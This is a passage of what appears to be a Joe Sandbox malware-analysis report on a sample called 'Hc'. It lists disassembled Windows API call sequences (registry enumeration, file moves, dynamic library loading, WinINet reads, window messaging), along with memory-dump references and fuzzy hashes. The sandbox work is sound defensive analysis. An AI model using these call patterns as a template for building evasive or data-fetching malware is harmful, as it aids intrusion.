• GetProcessIoCounters.KERNEL32(00000000,?), ref: 002EAEC8
• CloseHandle.KERNEL32(?), ref: 002EB09D
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 2d1ece0edfe74d56283c7c778eeafa7282ad4f422d2d9b7dc63e129dbb641a18
• Instruction ID: ccb721fb4f840c2a8d0a4a82f654f70a924268a02ae43f989e8b477eef0bf78b
• Opcode Fuzzy Hash: 2d1ece0edfe74d56283c7c778eeafa7282ad4f422d2d9b7dc63e129dbb641a18
• Instruction Fuzzy Hash: 19A1B071A143019FE721DF28C886B2AB7E5AF44710F54885DF5999B2D2DB71EC90CF82
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002ED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002EC10E,?,?), ref: 002ED415
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED451
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4C8
  • Part of subcall function 002ED3F8: _wcslen.LIBCMT ref: 002ED4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002EC505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002EC560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002EC5C3
• RegCloseKey.ADVAPI32(?,?), ref: 002EC606
• RegCloseKey.ADVAPI32(00000000), ref: 002EC613
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: dc047036daa2545ab50043920cbc715168635fdb9cf9d70278e170a76fe1f5d5
• Instruction ID: 7b3b0b8f29648aa798926c00a8f1eab9bd3c3075da6a2ec7283207e3a52fad19
• Opcode Fuzzy Hash: dc047036daa2545ab50043920cbc715168635fdb9cf9d70278e170a76fe1f5d5
• Instruction Fuzzy Hash: 2F61C531128281AFD314DF55C494E2ABBE5FF84308F94855CF0599B292CB31ED56CF91
APIs
  • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002CD7CD,?), ref: 002CE714
  • Part of subcall function 002CE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002CD7CD,?), ref: 002CE72D
  • Part of subcall function 002CEAB0: GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
• lstrcmpiW.KERNEL32(?,?), ref: 002CED8A
• MoveFileW.KERNEL32(?,?), ref: 002CEDC3
• _wcslen.LIBCMT ref: 002CEF02
• _wcslen.LIBCMT ref: 002CEF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 002CEF67
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: 4feb63f468a75a2a56e486a8a79059cd0b8cd91510d01598a319ad865d726b5a
• Instruction ID: 671ce644bdbfc3e88561d0ceacbde69d3ef359d7ed4413bc6d909bae62d8c9a4
• Opcode Fuzzy Hash: 4feb63f468a75a2a56e486a8a79059cd0b8cd91510d01598a319ad865d726b5a
• Instruction Fuzzy Hash: D35175B24183859BCB25EF50D881EDFB3DCAF85350F000A2EF585C3191EF71A6988B66
APIs
• VariantInit.OLEAUT32(?), ref: 002C9534
• VariantClear.OLEAUT32 ref: 002C95A5
• VariantClear.OLEAUT32 ref: 002C9604
• VariantClear.OLEAUT32(?), ref: 002C9677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002C96A2
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: 3186ec2bc5249b7417d67b743244e6099025b7e7937228720996fd85cf425062
• Instruction ID: e478af884de57663f6fe87496f9868bd9b1a2290ebb48065ef0a099e188d6ca5
• Opcode Fuzzy Hash: 3186ec2bc5249b7417d67b743244e6099025b7e7937228720996fd85cf425062
• Instruction Fuzzy Hash: BE516BB5A10219DFCB10CF58D884EAAB7F9FF89314B158559E909DB350E730E961CF90
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002D95F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 002D961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002D9677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002D969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002D96A4
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
• Opcode ID: 8442020917f536f0882d49657cc817bf482c07f7f94ecf664e4e60250bd46bd8
• Instruction ID: 66a102b823d7d36f72d5054a267007b5e5380b6d0da19c58dfebe5a8edd689ed
• Opcode Fuzzy Hash: 8442020917f536f0882d49657cc817bf482c07f7f94ecf664e4e60250bd46bd8
• Instruction Fuzzy Hash: 03512975A102159FCB01EF64C885A6ABBF5FF48314F048059F949AB362CB35ED91CF90
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 002E999D
• GetProcAddress.KERNEL32(00000000,?), ref: 002E9A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 002E9A49
• GetProcAddress.KERNEL32(00000000,?), ref: 002E9A8F
• FreeLibrary.KERNEL32(00000000), ref: 002E9AAF
  • Part of subcall function 0027F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,002D1A02,?,753CE610), ref: 0027F9F1
  • Part of subcall function 0027F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,002C0354,00000000,00000000,?,?,002D1A02,?,753CE610,?,002C0354), ref: 0027FA18
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
• Opcode ID: 5c4857478b676ced731ef987cc224cd577119f33779c71c588695230a3157730
• Instruction ID: 9bc2876f5fab0746bd069f460c0c89c601f900ce55a94c7d9fa96b1071d85ed3
• Opcode Fuzzy Hash: 5c4857478b676ced731ef987cc224cd577119f33779c71c588695230a3157730
• Instruction Fuzzy Hash: ED514735615246DFCB01EF69C0848ADBBB1FF09314B5480AAE80A9B322D731ED96CF91
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 002F766B
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 002F7682
                                                                                                                                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002F76AB
                                                                                                                                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,002DB5BE,00000000,00000000), ref: 002F76D0
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002F76FF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Long$MessageSendShow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3688381893-0
                                                                                                                                                                        • Opcode ID: 473e89b885725ce7b252adc696b7728e07ddc7e6c3e40ca85d0c88d57f93a050
                                                                                                                                                                        • Instruction ID: cfa342a9188151aaf24fa12f4261e681ae0583f18eada30b8960e9e36135802c
                                                                                                                                                                        • Opcode Fuzzy Hash: 473e89b885725ce7b252adc696b7728e07ddc7e6c3e40ca85d0c88d57f93a050
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A41D335A28509AFC7259F2CDC48FB5FB69EB053A0F150234FA19EB2A0D770AD60DA50
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                        • Opcode ID: 1c4a2743c8917c0a6f51bf83aa07444b98ca546b96a748931d28942d05fd0da7
                                                                                                                                                                        • Instruction ID: 307ddd00f60ce3f3848bd1ea108d159a71fa45403023109468a1025cc0135a1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4a2743c8917c0a6f51bf83aa07444b98ca546b96a748931d28942d05fd0da7
                                                                                                                                                                        • Instruction Fuzzy Hash: D641BE36A10200EBCF20DF78C881A5DB7E5EF89714F1585A8E515EB291D631ED16CB80
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 002C2262
                                                                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 002C230E
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 002C2316
                                                                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 002C2327
                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002C232F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                                        • Opcode ID: a2aa8ae06853e6d78e30190c293e27745d27781f9d1e1ccacbee9f207bb9ebf1
                                                                                                                                                                        • Instruction ID: 2a56db36e1964055341777993a2bf1c2aec66949183ed548fb0068fba31cdc25
                                                                                                                                                                        • Opcode Fuzzy Hash: a2aa8ae06853e6d78e30190c293e27745d27781f9d1e1ccacbee9f207bb9ebf1
                                                                                                                                                                        • Instruction Fuzzy Hash: 4531AF71910219EFDB14CFA8DD89BAE3BB6EB04325F104229F925E72D0CB709954DB91
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,002DCC63,00000000), ref: 002DD97D
                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 002DD9B4
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,002DCC63,00000000), ref: 002DD9F9
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,002DCC63,00000000), ref: 002DDA0D
                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,002DCC63,00000000), ref: 002DDA37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                                                        • Opcode ID: 5b14b018f968de17ccd1df793a7faa8706740c23dd3f14a5a62c47b6c75f0111
                                                                                                                                                                        • Instruction ID: eeb18098aa51c35fead5c6ba235a790f770ea94023de9d57798950398cb3879f
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b14b018f968de17ccd1df793a7faa8706740c23dd3f14a5a62c47b6c75f0111
                                                                                                                                                                        • Instruction Fuzzy Hash: 28315E71524A05EFDB20DFA5D898AAFBBF8EB04360B10842EE546D2250D771EE54DB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002F61E4
                                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 002F623C
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F624E
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F6259
                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F62B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                                                        • Opcode ID: e3af338d96fdf38a0dd2cfe0647278a459b516fc7bb1a488aeb12156abb8dffb
                                                                                                                                                                        • Instruction ID: 2fc4c45de02aa81315f98a2e82085c389ec7f0473e207beef04a76d3a68d8741
                                                                                                                                                                        • Opcode Fuzzy Hash: e3af338d96fdf38a0dd2cfe0647278a459b516fc7bb1a488aeb12156abb8dffb
                                                                                                                                                                        • Instruction Fuzzy Hash: FB219335D2021D9BDB11AFA0DC88AFEF7B9EB057A0F104266FB25EA180D7709995CF50
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 002E13AE
                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 002E13C5
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002E1401
                                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 002E140D
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 002E1445
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                                        • Opcode ID: 70daf37ee9f1751b79a42cfd35792ed49ec79fc358601e1693380734529d195d
                                                                                                                                                                        • Instruction ID: 2f32798db6e219769410b9d517ea93a8b2b9c8d97178cef90fca851068f1efff
                                                                                                                                                                        • Opcode Fuzzy Hash: 70daf37ee9f1751b79a42cfd35792ed49ec79fc358601e1693380734529d195d
                                                                                                                                                                        • Instruction Fuzzy Hash: 87219036610204AFDB04EF65D888AAEB7F9EF48350B148479F84AD7761CA30AC54DFA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0029D146
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029D169
                                                                                                                                                                          • Part of subcall function 00293B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029D18F
                                                                                                                                                                        • _free.LIBCMT ref: 0029D1A2
                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029D1B1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                        • Opcode ID: 16e7c46cbf6f4f1846be6e45c7d38457b59de41e1f22853d6a91227a25e4472e
                                                                                                                                                                        • Instruction ID: 17c914fdc25a2d98d682f2cb39e744bad645a33f1f8d1a25d61b6d2f0e54cb28
                                                                                                                                                                        • Opcode Fuzzy Hash: 16e7c46cbf6f4f1846be6e45c7d38457b59de41e1f22853d6a91227a25e4472e
                                                                                                                                                                        • Instruction Fuzzy Hash: 5901A7776216167F3B216A7AAC8CD7F7A6EDEC2BB13140129FD0CD6244DA608D11E5B0
                                                                                                                                                                        APIs
                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?,?,002C0C4E), ref: 002C091B
                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0936
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0944
                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?), ref: 002C0954
                                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0960
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                                        • Opcode ID: 82874b74cb7cbf662ac9963e8d38f50e60fa60fd9fcad8906a5a51276ee5b4cb
                                                                                                                                                                        • Instruction ID: 9430d649b9cf21c3048a910a6d1d89c89f6d56ea177c9ec450dbc66b717d4eb8
                                                                                                                                                                        • Opcode Fuzzy Hash: 82874b74cb7cbf662ac9963e8d38f50e60fa60fd9fcad8906a5a51276ee5b4cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 13018F72610205EFEB104F55EC88FAE7ABEEB44BE2F140228F905E2211D771DD51DBA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002CF2AE
                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 002CF2BC
                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 002CF2C4
                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 002CF2CE
                                                                                                                                                                        • Sleep.KERNEL32 ref: 002CF30A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2833360925-0
